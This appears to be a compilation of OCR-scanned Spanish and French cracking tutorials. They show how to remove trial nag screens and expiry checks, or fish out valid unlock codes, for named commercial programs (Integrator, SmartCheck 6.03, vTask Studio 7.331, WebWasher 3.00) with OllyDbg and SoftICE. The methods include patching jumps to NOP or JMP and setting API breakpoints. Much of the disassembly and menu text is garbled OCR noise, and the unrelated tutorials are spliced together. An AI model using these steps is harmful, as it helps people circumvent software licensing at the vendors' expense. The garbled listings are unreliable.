Ya tenemos la información necesaria así que a atacar se a dicho. 


Empezamos el Ataque. 


Comenzamos directamente con el depurador así que abrimos nuestro depurador y 
seleccionamos el Archivo Integrator.exe 

Aparecen unas alertas que pasamos de ellas olímpicamente. 

Bueno vamos colocando un punto de corte en Show Window así que en nuestra barra de 


Command EE ] 
Comandos pones A y ejecutamos el programa 


con F9 o el botón play. 


Bueno vamos a aprovechar la Pila la que nos relevara mucha información de lo que se 
ha hecho ya veréis la importancia de esta O 


Echamos una mirada a la pila y vemos estoy algo muy sospechoso Y pero demasiado. 


0012FE44|| 00BB9AGO 


0012FE48|| bOBABBAa 
B012FE4C|| BOB0Baaa 
20020D14| rt 1100, 6ClassesBTMemoryStreamb 


0B12FE6C 
DOSFA?35 
0O12FEB4 
0B12FECO 
DOSFAr72 
0B12FEB4 
0004B193 
pu422264 
DODOBBEE 
B1EF6723 
D1EF60BS 


Pointer to next SEH record 
SE handler 


Pointer to next SEH record 
SE handler 


Ba12FE74 
Ba12FE?3 
BO12FE7C 
DO12FESO 
BO12FES4 
BO12FES3 
Ba12FESC 
BO12FE90 
p012FE94 
BO12FE93 
BOB12FE9C 
BO12FEAD 
BO12FEA4 
BO12FEAS 
BO12FEAC 
DO12FEBO 
BO12FEB4 
BO12FEBS 
BO12FEBC 
BO12FECO 
BB12FEC4 


<JMP.¿AppInitialization.fTuappinitBinitializationsagqru> 


ASCII "Trialv071213_armain.oss” 
ASCII "Trialv071213_armain.htm” 


ASCII "body £ JEomargin: 6000; ¿0H € ¿ocolor: 1393935 
ASCII "Trialv071213_a” 
ASCII "<config>4 htmlonly = onJEl activate_over_trial_mode = 


RETURN to AppIniti.BBSFF934 from AppIniti.PUfemmagsoreentShowNe 


Pointer to next SEH record 
SE handler | 


DBSFF970 


Nos interesan los punteros 

0012FE5C |[008FA71D RETURN to ApplIniti.008FA71D 

0012FEB8 |008FF934 RETURN to AppIniti.008FF934 from ....Etcetera... 

Bueno ya tenemos las direcciones mágicas que son 

008FA71D 

008FF934 (en mi caso) Pueden cambiar en vuestro PC 

La mas importante es la primera así que vamos a ver que hacemos bueno vamos a esta 
dirección así que seleccionamos 


New origin here Ctrl+Gray * h 
- ET oo > 
Thread » Previous Minus 
E Followin Dump » Expression Ctri+G 


Y pegamos nuestra 
dirección en mi caso. 008FA71D 


Y caemos aquí 
FF92 FCoaBaaa 


64:3910 


Bueno aquí hay algo interesante 
E UL UL, 


IUOT HDL 


ES RAARSFFFF 


EB 12 
A1 3C309000 
3B3b 64030000 


33D2 

ES 9673FFFF 

38B15 038599000 MainCont.ETuregistryBAppNameLong 
8bB12 

Al 3C309000 

Es ?Cr2FFFF 

Al 3C309000 

3B15 

FF92 FCoOB0B0a 


Justamente donde indica la flecha hay un salto que evita la nag por lo cual tiene que 
haber otro que evite el salto así que nos colocamos justo debajo del salto 


OBSFASES| ES AA7SFFFF 
DOSFASEA|- EB 12 


DOSFREF1| SBSB 64830000 


BOSFAGF? 3302 
Y seleccionamos 
II LS E FST 6soB C 
FCW 1372 P 


3$qar Search for 


Selected command Cte 


Vier » Address constant 


Copy to executable 


Y encontramos estos 
HOgress LULSaSSeEmD1y LOMNmenT 


BOSFAGD6| JNZ SHORT Applniti.BBSFAGEC 
BBSFASEC| MOU EAX, DWORD PTR DS: [GUfemnagscreentfri (Initial CPU selection) 


Bueno seleccionamos el primero y le damos a 
Address |Disassenmbly 


GOSFASEC| MOV EAX, DWORD PTR DS: CGUFTInagscree MAMMA AAA Miel sl Enter 


Bueno hay vemos algo interesante esto Exactamente O 


UUSFH6L1 subs b113uBby ul 


OBSFRASCA] | Al 3309008 
DBSFRECF 29BS B2030090 B 
14 


DOSFASDS| |A1 3C309000 

BOSFASDD| | SBSB 64030000 

DOSFASES| |B2 B1 

DOSFASES| | ES RAA?SFFFF 
EB' 12 


A1 3C309000 
2830 64030000 


so FSO 
TO 650 
ñ DO 
Al 3C30900B Copy » 00 Lastl 
£0B83 B2030000 0 Binary » EFL 00200; 
Al 3C30900B =| STO empty 
SESa 64030000 3 Assemble Space El En empty 
B2 al Label : ST2 empty 
ES RAFSFFFF ST3 empty 
Comment ; ST4 empty 
A1 3C30900b . 
2880 64030000 Breakpoint » Toggle F2 
ro A 7SFErE , Run trace »  Conditional Shift+F2 
3B15 B3599000 NA , Conditional log Shift+F4 
38B12 New origin here Ctri+Gray * Ñ 
Al 3C309000 Run to selection F4 
ES 7TC72FFFF Goto 
20 E EaAS Thread Pb Memory, on access 
FF92 FCoBBaaa 6 Follow in Dump » Memory, on write 
3300 
eu search 


Bueno lo del BP por hardware es porque para mi es mas eficaz y cómodo (Todo esto 
relativo) en este caso nos 
Da mejores ventajas este. 


Después de ponerlo reiniciamos el Depurador. iniciamos la ejecución normal de la 
victima hasta que el depurador 


1 


BOSFRECS| 74 22 
A1 3C3u9000 
S0B3 B2030000 64 
Y5 14 
Al 3C309000 
2880 645030000 


B2 Bl 
DOSFASES| ES AA?SFFFF 
DOSFASEA|» EB 12 
DOSFASEC| Al 3C309000 
DOSFASF1| SBS3B 64030000 


Bueno esto lo he echo para ordenarnos así bueno tenemos menos suciedad en la pila. O 
Lo cual nos facilitara dar con la protección O 


Si miramos la pila vemos esto 
OOTZ2FESS] OIFALS4D 


BOSFASEC| AppIniti.BBSFAGBC 

BO12FES4 

BB12FE6C|Pointer to next SEH record 
SE handler 


BB12FECO| Pointer to next SEH record 
DOSFA772|SE handler 
BO12FEB4 


00000198 
66422264 | <JMP.¿+AppInitialization.CTuappinitBinitializationsiagru> 


ASCII "Trials071213_armain.coss” 
ASCII "Trials071213_amain.htm” 


B1F33F68| ASCII "body £ ¿Eomargin: 56000; ¿ENOJO € ¿ocolor: 43939: 
B1FDB268| ASCII "Trial“B71213_as” 
B1ECC678| ASCII "<config>48 htmlonly = onJEl activate_over_trial_mode 


DOBBBABn 
BB12FFOC| Pointer to next SEH record 
DOSFF9708|SE handler 


Buscamos de donde ha sido llamada 

0012FEB8 |008FF934 RETURN to ApplIniti.008FF934 from 
ApplIniti.(vUfrmnagscreenyShowNagscreen$qgriioo 

Bueno hay la tenemos la dirección 008FF934 

Bueno vamos hay a ver que es lo que pasa O 


wusrr3uL 


4SAAFFFF 
EB 1F 
6A 0B 
Al 6C309000 
OBECFFFF 


£C309000 
SSEBFFFF 


Ba 
£C1BFFFF 
20239000 


DOSFF94D 


Bueno pasa tres cuartos de lo mismo y esto a mi no me gusta así que vamos a ver si nos 


facilitamos las cosas 


Esto me empieza a sonar bien usas muy bien si nos fijamos más 
BUBSFF90D 


DOSFFIBE ÉS 45ARFFFF 
DOSFF913| .v|EB 1F 
BOSFF915 5A Ba 
DOSFF917 Ai 6C309006 
BOSFF91C ES BBECFFFF 


DOSFF921 
DOSFF922 
DOSFF927 
DOSFF92C 
DOUSFF92E 
DOSFF92F 
BOSFF934 
DOSFF939 
DOSFFISE 
DOSFF9SF a 
DOSFF941 

brete SCLeFrEE 


ARS ARA 


Al £c309000 
Es SSEBFFFF 


ES 24AAFFFF 
A1 538309000 
3A1SFFFF 


se 
0 0 
D DU 
o 
“0D 


aasFFOSO| . ECX 
ODSFF9S1 ECX 


59 
BOSFF952 64:8910 


DOSFF955| . 68 77F9SFOD 
BOSFF9SA| > 8D45 CS EAX, 
BOSFF95D| . ES REÍ?FFFF 
BOSFF962| . 8D45 D4 EAX» 


nta aio PA AAA rr 


(Jumps from OBSFFSEl, DBSFF730, DOSPF77F, BBSFF7C6 


mia anno Y 


Y eso de donde salio, bueno si hubierais ido viendo las rutinas con el desamblador nos 


hubiéramos dado cuenta pero buen 


También a plena vista se notaba debido a esas 4 instrucciones que me resultaron 


sospechosas a si sin más. 


Bueno como vemos en la foto hay 4 referencias y a nosotros nos interesa la primera. 


OBSFF977| . SBES | mou ESP, EBP 


mmm 


Lu 


Y caemos aquí 


Arg3 
Arg2 
Argl 
AppIni: 


an SN mp copy pane to cipboard 
B60423030/60 060 66 6B[66 06 66 BB|DB 66 66 BO|DB 06 46 Ba Go to JNZ from OOSFF6E1 
MArAA ODIA Qíal (aña Cara (aía fatal faía faía daña faíal rafa faía Sara faíal ara (aía (ara (ara 


DOSFFECO 
BBSFFEC2 
BOSFFEC4 
BOSFFECS 
DOSFFEC? 
BOSFFECI 
DOSFFECA 
BOSFFE6CF 64:FF30 
BOSFF6D2| . 64:8920 
DOSFFEDS| . Al 6C309000 
BOSFFEDA| . ES ESEPTFFFF 
DOSFFEDF| .  84c0 


3300 


5 
68 7OF98F0B 


DOSFFEDA 
BOSFF6DF 


Y comprobamos que no removió la instrucción siguiente así que lo guardamos y lo 
probamos. 
O Realmente Funciona. 


Y con esto hemos eliminado la protección claro nos quedaría el info. Pero a mi 
personalmente me da igual he he O 


Bueno espero que hoy hayas divertido y aprendido algo muy poco pero bastante para 
saber como eliminar un NAG nada más con la pilaO. 


-RECORDAR: PRACTICAR Y REPRACTICAR Y ESCRIBIR 


RECUERDA 


SI CREES QUE UNA APLICAIÓN TE ES UTIL, ESTA BIEN PROGRAMADA 
Y ADEMAS TE GUSTA, NO SEAS GOLFO Y REGISTRATE, AYUDARAS A 
SU PROGRAMADOR. 


Agradecimientos: A toda la lista Y especialmente a la parte activa y a SOLID, 
RICARDO MEK Y C_ CNCR Y Dapaf (hace mucho que no apareces) stxwei guan de 
dio y los que tengo en correo y en el MESENGER si tu eres uno de ellos Gracias. 


Aparte me gustaría agradecer a una persona que me metió en esto y me hizo despertar y 
salir de un camino equivocado por el cual me llevaba a ningún destino. Un profesor que 


me ayuda, me enseña y me forma día a día para llegar a uno de mis sueños. 


Gracias, a todos O 


Programme : Cracking to SMART CHECK 6.03 Tryal versión 
O1 : http://www.numega.com 
Numéro / Date : 17 - 27/06/2002 


Outils utilisé: 
-Softlce (de numega;-) 


Type: Name / serial + 45 jours de time limit 
Temp : qques minutes !!! 


Difficulté : A 
29/ PRATIQUE 


Nous allons voir comment enregistrer Smart Check 6.03 !!! 

Vous lancez smartcheck !! Chargez un programme vb comme si vous vouliez le débugger!! 
Puis program/Start !! 

Et lá une fenétre apparaít, vous rappellant que vous étes unregistered ! 

Vous clickez sur PURCHASE !! 

Et vous avez une nouvelle fenétre quí apparaít !! 

Il y a trois champs de texte !! 

Et un numéro "Registration number” en haut des trois cases texte !! Qui lui est généré 
aléatoirement a chaque lancement !!! 

Moi j'ai cette fois ci 0716508398499781 

Le prog a choisi ce numéro au hasard au lancement de la fenétre C'est toujours un nombre a 16 
chiffres!! 

Vous entrez un numéro bidon pour Unlock code. 

Moi j'ai mis 123456789. Ensuite vous mettez votre nom (tyo0oh pour moi) 

Et compagny (J'ai mis "corp") 

Vous chargez softice !! posez les bpx habituels: 


-BPX GetDlgltemTextA 
-BPX GetWindowTextA 


Vous revenez á smart check !!! 

Et vous validez !! softice break !! 3 coup de FS !! Car on veux qu'il récupere toutes les 
données des champs de texte !! 

Ensuite un fait 3 coup de f10 et on arrive juste aprés un CALL 10002864 !! 

Et on voit que les registres ont changés !!! 

on fait un "d ecx" et que voit ton ?? notre nom, un nombre a 16 chiffres (pour mol: 
1974441992468618 ), et notre unlock code bidon (pour moi: 123456789) !!!! 


Notez votre numéro c'est l'unlock code valide !! 

J'ai eu envie de tracer un peu plus loin histoire de voir ce qu'il se passait !! 

J'a1 vu deux autres call qui opéraient sur ecx et edx !! 

Apreés call 10005680 j'ai fait un "d ecx" ga m'a donné mon unlock code bidon !) 

Un "d edx" me montre 1974441992468618 le méme nombre que tout a l'heure!!! 

Le CALL 100025AB est trés interressant car juste aprés, si on fait un "d ecx” on voit un 


nombre a 16 chiffres encore !! Et différent de celui que l'on a trouvé tout a l'heure !! 
Dans mon cas c'est 5191296839093488 ainsi que mon unlock code bidon !!! 

J'a1 voulu tester ce numéro par simple curiosité pour voir si c'est un second Unlock code 
valide. 

J'al testé et devinez ce que j'ai eu comme réponse du prog !!! 

Une MsgBox me disant "Your trial périod has been restored." 


Donc en fait !! Smart Check génére deux numéros de serie !! Un premier pour s'enregistrer 
définitivement et un second pour réactiver la période des 45 jours de trial !! 

Je n'ai pas trop le temp de me pencher sur le keygen en ce moment!! 

Parce que c'est vrai que leur protection est assez bien car si on veux cracker le soft 

(e ne parle pas de patcher pour que le prog accpete tout les serials) il faut faire un 

keygen !!on ne peux pas enregistrer le soft simplement avec l'Unlock Code puisque 

Smart Check génére un Registration code a chaque lancement !! 

Et je pense que le keygen n'est pas de mon niveau !! Car lá j'ai vu un peu les routines... 
OULA AAaaa.. c'est autre chose que Uninstall manager 3.2 ou Hang 2000 !!!! 


3/ CONCLUSION 


Ce n'est pas pour cela que vous devez utiliser cette méthode pour enregistrer 

ce programme sans le payer !! Car c'est vralment un programme de qualité autant que softice ! 
NuMega fait vraiment d'excellent programmes ! 

Mais bon ce qui me fait un peu marrer c'est que un outil de numega a servi a cracker un 

autre outil numega !! 

ls ont méme pas calculé qu'on pourrait se servir de softice pour cracker smart check !!!;-) 


Si vous voulez me contacter: tyo0oohOcamnabis.be 
1ce pour cracker smart check !!!;-) 


Si vous voulez me contacter: tyo0oohOcamnabis.be 


Crackeando vTask Studio 7.331 


Saludos a todos, acá estoy nuevamente con otro tute, esta vez con un programa para crear 
programas o scripts a través de una interfaz grafica muy fácil de usar (aunque lo mejor es que 
lo descarguen y vean). 


Antes de empezar vuelvo a aclarar que soy pésimo destripando rutinas de seriales, por eso mis 
tutes se enfocan en sacar limitaciones . 


Lo pasamos por el RDG, nos dice que esta echo con Visual C++ y que esta protegido con 
IsDebuggerPresent, no gran cosa, con algún pluning de olly ya lo obvian. 


RDGPacker Detector vO.6.5 4 


CAARCHIV=IWVTASKS”1%wT ask.exe 


Microsoft Visual C++ 4.0 Compilador 


Nada Detectado 


Check IsDebuggerPresent e 
Contacto : Al Frente [] 


3 mA 


ed Archivo Escaneado en 2,11 Seg. O MA “¿MB 


Empecemos: 


Lo cargamos en olly, ejecutamos algún script para obviar la protección. Le damos F9 y se carga 
el programa. Vemos que este se carga por completo junto con una nag que nos dice que nos 
quedan 30 días para registrar el programa (sí claro jejeje) 
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vlask Studio 7.331 Purchase Information 
YlTask Studio Trial 


We hope you enjoy using vTask Studio! You can turn this trial version into a 
full version that will never expire. Purchasing vTask is easy and secure. 


30 Days Remaining 


You can purchase this product online immediately using the link below, After 
purchasing, you will receive a key which will unlock the software. Thank you 
for your support, which allows us to continue adding new Features! 


http: /Juwww. vista-software.com 


License Key: | 


Enter Key Remind Me Later 


Le damos a “Remind Later” y como siempre probamos el programa para ver sus limitaciones. 
Por suerte el programa es totalmente funcional por lo que procedemos a “examinarlo”. 


OLLYDBG: 


Busquemos alguna string referente a la nag, por ejemplo “Remaining”, buscamos y vemos que 


tenemos una 


string bastante interesante en 00421CF8 “%d Day%s Remaining”, que es el 


mismo mensaje que nos aparece en la nag de entrada. Ponemos un BP, CTRL.+F2, F9, y el 
programa se detiene en nuestro BP. 


B0421B65| PUSH vTask. 
B0421B8A|PUSH vTask. 
B0421C58|PUSH vTask. 
BO421CF8|PUSH vTask. 
B0421D09| PUSH vTask. 
B0421D95| PUSH vTask. 
00421DB1|PUSH vTask. 


ASCII 
ASCII 
ASCII 
ASCII 
ASCII 
ASCII 
ASCII 


"Arial” 
"IMGCaEWTTGPUAWUGT*Uahvycta*0ketquahuYkpfayu"Ewttogpuxatukap*Garnat gt *Uvctu0gpwKpkw” 
"JMGCaEWTTGPUAWUGT*Uahvyctg*0ketquahvYkpfayu*EwttgpuXatukap"Garnatat*Uvotv0apwNa ahh" 
"2d Day%s Remaining” 

”UTKCN"RGTKOF"GZRKTGF"" 

"http://www.Vista-software. com” 

"Go to the Vista website” 


BB4AS58c 
BO4AS538 
Ba4A3618 
BB4AS524 
Ba4ASs50c 
pu4A446C 
DO4AS4F4 


Ponemos un BP, CTRL.+F2, F9, y el programa se detiene en nuestro BP. 


BB421CES 
BB421CEA 
00421CEF 
B0421CFO 
00421CF1 


DO OO 


660421DBE 
BB421D15 
aa421D16 
0421020 


MOU EAX, 
50 PUSH EAX Ys 
57 PUSH EDI %d 
3D9424 340101 LEA EDX, 
68 24554A00 | PUSH Format 
52 PUSH EDX s 
FF1S ACE64901 BALE DWORD PTR DS: C<2¿USER32.wsprintfA>1|LusprintfA 
; ADD ESP, 10 


PUSH 
LEA EAX, 


PUSH EAX 
MOU DWORD PTR DS: [400904], Task. 004030Al 
CALL EBx 


= "4d Day%s Remaining” 


ASCII "UTKCN"RGTKGF”"GZ2RKTGF” 


409400 


C705 MB 
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Vemos que nuestra string es puesta en pila, posiblemente para luego extraerla para armar la 
nag, (NOTA: como habrán visto en 00421D09 un push ASCII, les aclaro que si forzamos el salto 
a este PUSH, el programa terminara el periodo de prueba, jejeje) 


Bueno, empezamos a ir para arriba para encontrar el inicio de esta rutina vamos subiendo y 
vemos en 00421AD1 “vTask Studio %s Parchase Información”, ósea él titulo de la nag, ya 
estamos cerca seguimos subiendo hasta 004219C0 donde tenemos el inicio de la rutina de la 
nag. Ponemos un BP reiniciamos, F9 y el programa para en nuestro BP. 


cc INT3 
cc INT3 
cc INT3 


. S1EC 78040001 SUB ESP, 478 
. Ai 208B4C00 |MOU EAX, DWORD PTR DS: [4C38B20] 


o . 3304 XOR EAX, ESP 
00 . 898424 740401 M0U DWORD PTR SS: [ESP+474],ERAX 
se . 53 PUSH EBX 
. ES PUSH EBP 
. 56 PUSH ESI 
. SBB424 280401 MOU ESI, DWORD PTR SS: [ESP+488] 
. 3300 XOR EAX, EAX 
. 57 PUSH EDI 


Seen a4m4al Mn ENT AMAN PTA 2. rESPraGa7 


Nos fijamos la pila y vemos que tenemos un RETURN desde USER32 (medio raro esto). 


> 7] 


RETURN to USE 


TAO 3 


a 


B| uTask.6004219C0 


o 1 
Do 


Dl 
DO 


vTask. 00421900 


< 


Si nos metemos en este return, no llegamos a ningún lado, y el programa se ejecutara, así que, 
nos posicionamos en el BP que paró y apretamos CTRL.+R para buscar todas las llamadas a 
esta función, vemos que solo es una desde 0041620C, le ponemos otro BP, CTRL+F2, F9 y el 
programa para en el BP. 
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BO4161EB| . 
BO4161FB| . 
BO4161FS| . 
BB4161FC| . 
B64161FD| . 
9004 . 
14 .y 
p 
641623 . 


68 40200500 
68 B4ER4900 


309424 301001 LEA EDX, 


52 

5A 6n 

FF1S CS8E6490 
E9 E20Co0000 
5A 4n 

68 Ca194200 
57 

68 49040000 
5A 4n 

C6B5 9CDS4CAl 


FF15 S0E34901 CALL DWORD PTR DS: [<6KERNEL32. GetModu Lel 


50 

FF1S F4E5490 
33F8 601 

OFES B6BCODAl 


PUSH 52048 
PUSH 


PUSH EDX 
PUSH 
nu DWORD PTR DS: [C<4USER32.MessageBoxA 


PUSH O 

PUSH vTask. 0042190 
PUSH EDI 

PUSH 449 

PUSH O 

MOU BYTE PTR DS: [4CD0389C],0 


PUSH EAX 
CALL DWORD PTR DS: C<£USER32.DialogBoxPaj 
CMP EAX, 1 


Jumps from B0415FDF, BO41SFFS, DO416016, BB41É01E, BO416B2E, BO41E6B45S, BO416059 


Style 
Title 


MB_OK:MB_1I 
Text 
hOwnex = NULL 
MessageBoxA 


f lParam = NULL 


hOwner 

pTemplate = 449 

¡e = NULL 
GetModu leHandleA 
hInst 
DialogBoxParamA 


Vemos justo arriba del BP que tenemos varias llamadas, por lo que tendremos que ver cuales 


son las que llaman a esta función, apretamos CTRL+R y ponemos un BP en cada llamada. 
CTRL.+F2, F9 y el programa para en 00415FDF. 


BO41S5FES| . 
BB41SFE9| . 
BO41SFEA| + 
0B41SFEB| . 
00415FF1| . 


Ba4165640| . 
66416641] . 
aB416043| . 


Ba41604B| . 
60416050] . 


aB416B56| . 


BB416B05F| . 


pFa4 25020001 
8D5424 44 

s2 

7 

FF1S ABE3490 
85ca 

6FS4 1102000 
817024 44 B3 
74 19 

AL ABDS4caa 
6a en 

7 

FF1S A4E3490 
3D 02010090 
OFSS EEG1000 
e5FF 

0Fs4 ESa1000 
68 66s0009a 
57 

FFD3 

85ca 

9Fs4 DEB1099 
6a en 

68 88130000 
68 66800090 
57 

FFD6 

85ca 

0FS4 EFO1O00 
68 SACF4COD 
FF1S F4E3490 
saF8 18 


BFSC ABB1ODa 


F6B5_9CD34CO 


JE yTask. 00416204 
LEA EDX, 

PUSH EDX 

PUSH EAX 

CALL DWORD PTR DS: [<8KERNEL32. GetExitCo 
TEST EAX, EAX 

JE vTask. 00416204 
cnP 


,103 


MOU EAX, DWORD PTR DS: [4CDSAB] 
PUSH a 
PUSH EAX 
CALL DWORD PTR DS: [<2KERNEL32.WaitForSi 
CMP EAX, 102 
JN2 vTask.B04162598 
TEST EDI,EDI 
JE vTask. 00416204 
PUSH 2066 
PUSH EDI 
EBX 
TEST EAX, EAX 
JE vTask. 00416204 
PUSH a 
PUSH 1388 
PUSH 2066 
PUSH EDI 
CALL EsI 
TEST EAX, EAX 
JE vTask. 0041620 
PUSH 
CALL DWORD PTR DS: C<2KERNEL32. LstrlenA> 
CMP EAX,18 
vTask. 00416209 


Timeout 
hObject 
WaitForSingle0bject 


Strin 


pEx itCode 
hThread = 
GetEx itCodeThread 


D0B0BBAS (window) 


B. ms 
BOBBBBAS (window) 


gq" 


IstrlenA 


Aquí vemos todos los saltos que se dirigen a nuestra función que crea la nag, por lo que 


tendremos que noppear todos los saltos para asegurarnos que nunca valla a la función que 


crea la nag. 
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Noppeamos los saltos, guardamos todos los cambios, probamos el programa y este arranca sin 
la maldita nag!!!! Jejeje ya lo tenemos, cargamos algún ejemplo del programa, apretamos F5, 
F6 y F7, lo probamos y vemos que funciona de maravillas, creamos un exe y lo mismo, 
funciona, solo nos falta una última cosa. 


Adelantamos el reloj de Windows (si tienen antivirus ciérrenlo porque posiblemente les traiga 
problemas con las licencias), yo casi siempre lo adelanto 1 año, vuelvo a ejecutar el programa, 
lo pruebo, aprieto F5 y .... Pufff 


The trial period For this software has expired. 


Please go to ww. vista-software.com For information concerning the latest version. 


Do you want to go there now? 


Ya me aprecia muy fácil esto, aunque no se asusten jejej. 


Aquí podríamos hacer dos cosas, o buscar en las string algo referente a esta ventana (Ej.: 
www.vista-software.com) o caer justo donde se genera la ventana a través de apis. En esta 
ocasión vamos por las apis. 


Cargamos en olly el programa anteriormente modificado, apretamos CTRL.+N para ver todas 
las apis que usa el programa y buscamos la un api que sirva para generar mensajes, como por 
ejemplo MessageBoxaA. 


BO49E3F4| .rdata Import KERNEL32. |strlenA 
B049E30C| .rdata Import KERNE .MapViewOfFi le 
BB49E4E0| .rdata Import ¡2 MapV irtualKeyA 
BaB49ESFO| .rdata Import MessageBeep 
BB49E6C8 .rdata Import USERS2., MessageBoxA 
BB43E482 | .text Export ModuleEntryPoint> 
B049E534| .rdata Import USER32,mouse_event 
BB49E1AS| .rdata Import KERNEL32.MoveF i LeA 


Le ponemos un BP y nos sale una advertencia diciendo que estamos intentando poner un BP 
fuera de la sección de código (al parecer ha protegido algo el programador del programa), pero 
eso no nos detendrá, hacemos Click derecho sobre MessageBoxaA, Bien Cha Bree y vemos 
todas las llamadas del programa a MessageBoxaA, le ponemos un BP a todas y corremos el 
programa. Cargamos algún ejemplo del programa apretamos F5, y olly para en MessageBoxA 
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00412746 
60412740 
b041274F 
00412753 


600412758 
6041275D 
00412764 


600412765 


bn412 


6041 


. | 3819 

a 

> |8B7424 14 

. [68 34200500 

. [68 B4ER4900 

. [808424 30100 

. |59 

. |56 

. |FF1IS CSE6490 

. |83F3 06 

«| BFS5S 7747000 

. [6A Ba 

. [683 54040000 

. [63 11010000 

. |56 

. |FF1IS ASE6490 

«| ES 5F470000 

> +8B4C24 1C 

. 8B5424 14 

. Al CS8AB4COB 
£0 AR 


CMP BYTE PTR DS: [ECXJ,BL 


MOU ESI, 
PUSH 52034 
PUSH 
LEA EAX, 
PUSH ERAX 
PUSH ESI 
CALL DWORD PTR DS: [<4USER32. MessageBoxA 
S EAX, 6 
vTask . 80416EEC 
PUSH B 
PUSH 454 
PUSH 111 
PUSH ESI 
yr DWORD PTR DS: [<LUSER32. SendiMessage 


MOU ECX, 
MOU EDX, 


MOV EAX, DWORD PTR DS: [4CABCSI 
PLISH A 


Styl 
Titl 


Dom 


Text 
hOwnex 
MessageBoxA 


Mm <= 15] 

1” = 454 

ae = lWM_COMMAND 
hlind 

SendMessageA 


Puras —= ARARARAR 


MB_YESNO; MB_ICONE 


Aquí tenemos la rutina que nos muestra la el mensaje de salida, si vemos EAX vemos el texto 


de la ventana. Si nos fijamos, después del MessageBoxA, tenemos una comparación EAX,6, y 


un salto, esto es la comparación para saber que botón apretamos, Sl o NO, y después un jmp 


hacia 00416EEC, salteándonos 0041278D, que sospecho es nuestra rutina del programa que 


queremos ejecutar y la ventana no nos deja. 


Nos posesionamos sobre 0041278D y ponemos un BP en cada llamada. CTRL.+F2, F9, y 


probamos el programa, cargamos algún ejemplo, F5, y olly para en 


0041 


60412710 


UOFLECID| . DIL4 14 
Ba412719| . 85CB 
«¿74 78 


. [683 70354A00 
. [809424 20100 
. |52 

. | FFD6 

. [389024 28100 
.«v| 74 18 


A e 


TEST EAX, EAX 


PUSH 
LEA EDXx, 
PUSH EDX 

ESI 
CmP 


»BL 


ASCII "lkhitwu ldo 


Pero como nosotros queremos que valla a nuestra función del programa, cambiamos el JE por 


JMP y vemos que el programa corre sin problemas!!! (Si aparece otro BP en MessageBoxA es 


propio del ejemplo, sacar el BP y apretar F9), ahora probamos los demás botones, F6 y olly 


para en 


DU? LEDOD 


00412670 


y lo mismo, cambiamos el JNZ por JMP, apretamos F9 y el programa se ejecuta sin problemas, 


«e BFSS 14010001 JNZ 


DA CUA 


66: 3BCA 


Al ABDS4COn 
3500 


.«v| 74 4B 


803024 340001 
51 
50 
FF15 ABE349M1 


HUY EUA) 127 


CMP CX, Dx 


MOU EAX, DWORD PTR DS: [4CD5A6] 
TEST EAX, EAX 


LEA ECX, 

PUSH ECX pEx ¡tCode 

PUSH EAX [Fmrcs. => BBBBBBAS (window) 
CALL DWORD PTR DS: [<2KERNEL32.GetEx ¡tColLuetEx itCodeThread 


apretamos ahora F7 y olly para en el mismo lugar de antes, apretamos F9 y el programa se 
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ejecuta de manera correcta, bien, ya casi estamos, ahora solo nos falta la ventana de salida, 


cuando cerramos el programa. Lo cerramos y olly para en un MessageBoxaA. 


DO4BF2F3 


BO4BF2F9 
DBIBF2FF 


575 FO 


683 04000400 
68 B4ER4900 
8D3C24 301001 
si 

FF15 CCE64901 
su 

FF15 CSE64901 


FF1S 78E44901 


JNZ 
PUSH 40004 
PUSH 
LEA ECX, 
PUSH ECX 
CALL DWORD PTR DS: [<24USER32.GetDesktopu 
PUSH EAX 
CALL DWORD PTR DS: C<2USER32.MessageBoxA 
En EAX, 7 
SHORT vTask. 0849F2F9 
PUSH 1 
PUSH EDI 
PUSH EDI 
PUSH 
PUSH EDI 
PUSH EDI 
CALL DWORD PTR DS: [<8:SHELL32. She l lExecu 


8B15 DCAB4CA! MOU EDX, DWORD PTR DS: [4CABDCI 


68 AS1A4ADO 


PUSH 


Style 


Title 


MB_YESNO ¡MB_APPLMODAL ; 40000 


Text 
[GetDesktopllindow 
hOwnexr 


MessageBoxA 


IsShown = 1 
DefDir 


"http: //www.Vista-software.com” 


Operat ¡on 
hlind 
Shel lExecuteA 


ASCII "**0nTop” 


Como vemos, en 0040F2F9, tenemos nuestra rutina del programa que se ejecutara si no 


tuviésemos la nag, nos posesionamos sobre 0040F2F9, CTRL.+R y ponemos un BP en todas los 


se cierra de manera correcta. Salvamos todos los cambios, probamos el programa y vemos que 


este anda de manera correcta. 


Conclusiones: 


Un programa excelente en cuanto a las funciones que ofrece pero muy mal protegido, solo un 


IsDebuggerPresent que no nos representa mayor inconveniente. Si bien hay tantas formas de 


encarar cada programa como crackers existen, cada uno debe buscar el método que mas le 


guste, también podría haber estudiado toda la rutina de generación del serial, pero me gusta 


mas romper las protecciones. 


Saludos a todos y suerte. 
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Tutorial N* 1 

Programa: WebWasher Versión 3.00 

Descarga:http: //www.webwasher.com 

Objetivo: Simular estar registrado + interactuar con el programa 

Herramientas necesaria: W32Dasm, File insPEctor, Softice y Hiew (editor hexadecimal). 

Dificultad: Newbie 

Cracker: Prometeo 

Este tutorial está realizado únicamente con fines educativos, y que no puedo hacerme responsable 
del mal uso que se pueda hacer de la información aquí comentada. Esta bien que hay programadores y 
grandes corporaciones que son unos H. de P. pero una cosa no quita la otra así que si te gusta el 
programa cómpralo. 

Introducción: 

Bueno para empezar podemos decir que este es mi primer tutoiral, en el cual no pretende ser un tuto 
de reputa madre pero creo que puede servir de algo a aquellos que recién empiecen en esto del 
cracking para que se animen y como se dice le metan manos a cualquier programa que encuentren por 
hay. 

Muchas veces o por lo menos a mi me paso que nos llenamos de teorías de como se debe hacer algo 
pero luego cuando vamos a la practica decimos ¡por donde carajo empieso?. Bueno entonces es por 
eso que vamos a tratar de hacer de implementar una temática de trabajo que serán aplicables a los 

trabajos que relices con posterioridad. 

Breve descripción del programa:WebWasher es un programa que sirve de filtro para páginas web. Se 

instala en la PC o servidor como un agregado al navegador y evita contenidos no deseado - como 

anuncios. WebWasher también evita recarga innecesaria de objetos de la red e imágenes animadas. 

Esto ahorra un 45% de los datos que normalmente se transmiten y tu navegador muestra las paginas 
web prácticamente libre de anuncios. 

El resultado es que muestra las páginas considerablemente más rápido, el tiempo de búsqueda es más 
cortos en Internet. 

Empecemos a Crackear: 

Paso 1: Arrancamos al programa en cuestión y hacemos doble click sobre el símbolo de este que 
aparece en la barra de tareas, luego vamos a register, e introducimos nuestro datos, en mi Caso 
Name: Prometeo, Company:. (por poner algo) y License key:12345678 presionamos el botón register y 
sera casualidad la puta que lo parió no nos registra! Entonces tomamos nota o recordamos el 
